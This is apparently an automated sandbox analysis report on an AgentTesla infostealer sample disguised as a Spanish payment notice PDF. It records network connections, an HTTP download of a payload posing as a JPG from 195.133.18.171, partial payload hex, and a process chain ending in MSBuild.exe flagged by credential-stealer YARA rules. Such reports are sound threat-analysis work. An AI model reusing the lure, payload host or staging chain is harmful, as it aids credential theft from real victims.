                                  May 13, 2022 17:18:21.264317036 CEST49720443192.168.2.6131.253.33.200
                                  May 13, 2022 17:18:30.198323965 CEST49741443192.168.2.620.190.160.3
                                  May 13, 2022 17:18:30.198375940 CEST4434974120.190.160.3192.168.2.6
                                  May 13, 2022 17:18:30.198575974 CEST49741443192.168.2.620.190.160.3
                                  May 13, 2022 17:18:30.198838949 CEST49742443192.168.2.620.190.160.3
                                  May 13, 2022 17:18:30.198873997 CEST4434974220.190.160.3192.168.2.6
                                  May 13, 2022 17:18:30.198937893 CEST49742443192.168.2.620.190.160.3
                                  May 13, 2022 17:18:30.204220057 CEST49741443192.168.2.620.190.160.3
                                  May 13, 2022 17:18:30.204272032 CEST4434974120.190.160.3192.168.2.6
                                  May 13, 2022 17:18:30.204385996 CEST49742443192.168.2.620.190.160.3
                                  May 13, 2022 17:18:30.204427958 CEST4434974220.190.160.3192.168.2.6
                                  May 13, 2022 17:18:31.582159042 CEST49744443192.168.2.620.190.160.133
                                  May 13, 2022 17:18:31.582242012 CEST4434974420.190.160.133192.168.2.6
                                  May 13, 2022 17:18:31.582381964 CEST49744443192.168.2.620.190.160.133
                                  May 13, 2022 17:18:31.607773066 CEST49744443192.168.2.620.190.160.133
                                  May 13, 2022 17:18:31.607806921 CEST4434974420.190.160.133192.168.2.6
                                  May 13, 2022 17:18:32.028403044 CEST49746443192.168.2.620.190.160.3
                                  May 13, 2022 17:18:32.028455973 CEST4434974620.190.160.3192.168.2.6
                                  May 13, 2022 17:18:32.028549910 CEST49746443192.168.2.620.190.160.3
                                  May 13, 2022 17:18:32.032512903 CEST49746443192.168.2.620.190.160.3
                                  May 13, 2022 17:18:32.032557964 CEST4434974620.190.160.3192.168.2.6
                                  May 13, 2022 17:18:48.796430111 CEST4976380192.168.2.6195.133.18.171
                                  May 13, 2022 17:18:48.826342106 CEST8049763195.133.18.171192.168.2.6
                                  May 13, 2022 17:18:48.826487064 CEST4976380192.168.2.6195.133.18.171
                                  May 13, 2022 17:18:48.827500105 CEST4976380192.168.2.6195.133.18.171
                                  May 13, 2022 17:18:48.858424902 CEST8049763195.133.18.171192.168.2.6
                                  May 13, 2022 17:18:48.858488083 CEST8049763195.133.18.171192.168.2.6
                                  May 13, 2022 17:18:48.858527899 CEST8049763195.133.18.171192.168.2.6
                                  May 13, 2022 17:18:48.858567953 CEST8049763195.133.18.171192.168.2.6
                                  May 13, 2022 17:18:48.858607054 CEST8049763195.133.18.171192.168.2.6
                                  May 13, 2022 17:18:48.858638048 CEST4976380192.168.2.6195.133.18.171

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                  May 13, 2022 17:18:58.378077030 CEST8.8.8.8192.168.2.60x5a16No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)
                                  May 13, 2022 17:19:05.113801956 CEST8.8.8.8192.168.2.60x1684No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)

                                  HTTP Request Dependency Graph

                                  • 195.133.18.171

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  0192.168.2.649763195.133.18.17180C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe
                                  TimestampkBytes transferredDirectionData
                                  May 13, 2022 17:18:48.827500105 CEST712OUTGET /Znmtganqo_Wvetpunc.jpg HTTP/1.1
                                  Host: 195.133.18.171
                                  Connection: Keep-Alive
                                  May 13, 2022 17:18:48.858424902 CEST713INHTTP/1.1 200 OK
                                  Content-Type: image/jpeg
                                  Last-Modified: Fri, 13 May 2022 13:56:45 GMT
                                  Accept-Ranges: bytes
                                  ETag: "8dce3a48d166d81:0"
                                  Server: Microsoft-IIS/10.0
                                  Date: Fri, 13 May 2022 15:18:48 GMT
                                  Content-Length: 418304
                                  Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 d0 00 00 00 0c 00 06 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 00 39 00 34 00 30 00 33 00 2e 00 38 00 36 00 31 00 38 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 20 00 79 00 6c 00 62 00 6d 00 65 00 73 00 73 00 41 00 01 00 0f 00 46 00 00 00 00 00 33 00 39 00 34 00 30 00 33 00 2e 00 38 00 36 00 31 00 38 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 0f 00 42 00 00 00 00 00 00 00 00 00 65 00 6d 00 61 00 4e 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 01 00 22 00 00 00 00 00 6c 00 6c 00 64 00 2e 00 73 00 67 00 6b 00 74 00 7a 00 73 00 78 00 62 00 75 00 73 00 76 00 6b 00 6e 00 72 00 6b 00 4e 00 00 00 65 00 6d 00 61 00 6e 00 65 00 6c 00 69 00 46 00 6c 00 61 00 6e 00 69 00 67 00 69 00 72 00 4f 00 01 00 15 00 52 00 00 00 00 00 00 00 00 00 73 00 6b 00 72 00 61 00 6d 00 65 00 64 00 61 00 72 00 54 00 6c 00 61 00 67 00 65 00 4c 00 01 00 01 00 2a 00 00 00 00 00 00 00 74 00 68 00 67 00 69 00 72 00 79 00 70 00 6f 00 43 00 6c 00 61 00 67 00 65 00 4c 00 01 00 01 00 26 00 00 00 00 00 6c 00 6c 00 64 00 2e 00 73 00 67 00 6b 00 74 00 7a 00 73 00 78 00 62 00 75 00 73 00 76 00 6b 00 6e 00 72 00 6b 00 4e 00 00 00 65 00 6d 00 61 00 4e 00 6c 00 61 00 6e 00 72 00 65 00 74 00 6e 00 49 00 01 00 15 00 4a 00 00 00 00 00 33 00 39 00 34 00 30 00 33 00 2e 00 38 00 36 00 31 00 38 00 2e 00 30 00 2e 00 31 00 00 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00
                                  Data Ascii: 8p39403.8618.0.1noisreV ylbmessAF39403.8618.0.1noisreVtcudorPBemaNtcudorP"lld.sgktzsxbusvknrkNemaneliFlanigirORskramedarTlageL*thgirypoClageL&lld.sgktzsxbusvknrkNemaNlanretnIJ39403.8618.0.1noisre


                                  Statistics

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:17:18:27
                                  Start date:13/05/2022
                                  Path:C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe"
                                  Imagebase:0x5d0000
                                  File size:55296 bytes
                                  MD5 hash:05B6B97166B339557424CA035418A640
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Yara matches:
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.480316793.0000000003980000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.480316793.0000000003980000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low

                                  General

                                  Target ID:7
                                  Start time:17:19:01
                                  Start date:13/05/2022
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\cmd.exe" /c timeout 15
                                  Imagebase:0xed0000
                                  File size:232960 bytes
                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Target ID:8
                                  Start time:17:19:02
                                  Start date:13/05/2022
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff6406f0000
                                  File size:625664 bytes
                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Target ID:9
                                  Start time:17:19:02
                                  Start date:13/05/2022
                                  Path:C:\Windows\SysWOW64\timeout.exe
                                  Wow64 process (32bit):true
                                  Commandline:timeout 15
                                  Imagebase:0xd80000
                                  File size:26112 bytes
                                  MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Target ID:12
                                  Start time:17:19:18
                                  Start date:13/05/2022
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                  Imagebase:0x880000
                                  File size:261728 bytes
                                  MD5 hash:D621FD77BD585874F9686D3A76462EF1
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Yara matches:
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000000.472348543.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000C.00000000.472348543.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.626727734.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000C.00000002.626727734.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000000.471775645.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000C.00000000.471775645.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000000.472717086.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000C.00000000.472717086.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000000.473012111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000C.00000000.473012111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.627763645.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.627763645.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: 0000000C.00000002.627763645.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                  Reputation:high

                                  Disassembly

                                  No disassembly